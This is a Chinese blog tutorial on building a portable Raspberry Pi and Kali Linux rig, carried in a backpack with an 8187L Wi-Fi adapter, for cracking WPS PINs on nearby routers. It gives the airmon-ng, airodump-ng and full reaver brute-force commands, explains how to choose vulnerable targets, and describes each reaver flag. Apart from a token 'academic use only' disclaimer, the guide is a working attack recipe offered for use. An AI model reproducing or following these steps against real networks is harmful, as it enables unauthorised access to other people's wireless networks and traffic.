树莓派+8187L 安装 kali linux 跑pin

学术交流使用，小伙伴不用乱用哦

树莓派一个 一个TP 迷你网卡 一个8187L卡皇（某宝老板没有3070了）TF卡一个（8G以上）
3070更小 和 树莓派更般配 或者使用全向天线 这次我用的是定向

使用 tp迷你网卡做ap 一个5V2A的充电宝 一个小书包 放在书包里最好使用全向天线。 用手机连接到树莓派 可以实现某些特殊的渗透
最后后一张放图给大家看
首先去下载 kali linux 地址：https://www.offensive-security.com/kali-linux-vmware-arm-image-download/

用Win32_Disk_Imager 写入 TF卡




将TF卡插入树莓派，接好所有组件再接通电源



使用SSH连接（前提你知道IP，不知道请自行百度，百度都可以找到）





我这台连接了三个网卡 其中 wlan0 是8187L（可以用iwconfig查看到）
使用airmon-ng start 你的网卡名称


在用ifconfig 看一下网卡 网卡的名字变了记住这个新名字 下面在使用的8187L的时候都要用这个新名字



然后使用 airodump-ng wlan0mon 开始监听
(
有可能不能使用，那就重启一下网卡
ifconfig wlan0mon down

iwconfig wlan0mon mode monitor
ifconfig wlan0mon up
)
airodump-ng wlan0mon 开始监听
现在就可以捕获到好多的信号，不要高兴太早，根据上面的airodump搜索到的无线信号，然后可以挑信号强的进行破解（也就是 PWR这一列 的值越小越好）也不是所有的都能跑pin（MB这一列54e. 就有这个“.”才可以去跑pin）现在挑一个信号强的使用REAVER的命令
还有一点：记记住BSSID（就是路由器的MAC） CH（信道，也可以不用） ESSID（wifi的名称，不然你都不知道 你跑的是那个wifi就搞笑了）
当然你要先安装 apt-get install reaver

reaver -i mon0 -b 00:00:00:00:00:00 -a -S -vv -d2 -t 5 -c 11

-i 使用的网卡
-b mac地址
-a 自动检测目标AP最佳配置
-S 使用最小的DH key，可以提高PJ速度
-vv 显示更多的非严重警告
-d 即delay每穷举一次的闲置时间 预设为1秒
-t 即timeout每次穷举等待反馈的最长时间，如果信号不错，可以这样###设置
-c 信道就是 CH的值 可加可不加

下面你要做的就是等TA跑完。。。
全家福



本文出自 “浪漫的偷笑” 博客，转载请与作者联系！